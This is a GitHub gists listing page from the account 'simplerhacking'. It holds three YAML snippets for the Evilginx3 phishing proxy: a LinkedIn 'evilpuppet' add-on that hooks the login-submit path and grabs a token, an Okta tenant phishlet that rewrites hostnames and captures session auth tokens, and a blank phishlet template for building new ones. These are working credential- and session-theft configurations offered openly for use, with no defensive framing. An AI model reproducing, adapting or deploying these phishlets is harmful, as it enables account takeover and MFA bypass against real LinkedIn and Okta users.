Skip to content

Instantly share code, notes, and snippets.

View simplerhacking's full-sized avatar
💭
I may be slow to respond.

simplerhacking

💭
I may be slow to respond.
View GitHub Profile
@simplerhacking
simplerhacking / LinkedinEvilpuppet.yaml
Created November 22, 2023 12:47
Evilpuppet Script for Linkedin (Evilginx3)
# evilpuppet add-on for Linkedin
evilpuppet:
triggers:
- domains: ['www.linkedin.com']
paths: ['/checkpoint/lg/login-submit']
token: 'apfc'
open_url: 'https://www.linkedin.com/login'
actions:
- selector: '#username'
@simplerhacking
simplerhacking / Okta-Phishlet.yaml
Last active March 1, 2024 09:30
Evilginx3 Okta Phishlet (For Okta Tenant)
name: 'Okta'
author: 'www.simplerhacking.com'
min_ver: '3.0.0'
proxy_hosts:
- {phish_sub: 'okta-tenant-here', orig_sub: 'okta-tenant-here', domain: 'okta.com', session: true, is_landing: true, auto_filter: true}
sub_filters:
- {triggers_on: 'okta-tenant-here', orig_sub: '', domain: 'okta-tenant-here', search: 'okta-tenant-here.okta.com', replace: '{hostname}', mimes: ['application/ion+json']}
- {triggers_on: 'okta-tenant-here', orig_sub: '', domain: 'okta-tenant-here', search: 'https.*\.okta\.com', replace: 'https://{hostname}', mimes: ['text/html']}
auth_tokens:
- domain: 'okta-tenant-here'
@simplerhacking
simplerhacking / Evilginx3-Phishlet-Template.yaml
Created November 3, 2023 04:57
Evilginx phishlet template for creating your own from scratch.
name: 'Your First Phishlet'
author: 'Simpler Hacking'
min_ver: '3.2.0'
proxy_hosts:
- { phish_sub: 'www', orig_sub: 'www', domain: '{domain}', session: true, is_landing: true }
sub_filters:
- { hostname: '{hostname}', sub: 'www', domain: '{domain}', search: '{domain}', replace: '{hostname}', mimes: ['text/html', 'application/javascript', 'text/css', 'application/json', 'image/x-icon', 'text/plain', 'application/xml', 'image/*', 'font/*']}
- { hostname: '{hostname}', sub: 'www', domain: '{domain}', search: '{domain}', replace: '{hostname}', mimes: ['application/x-www-form-urlencoded']}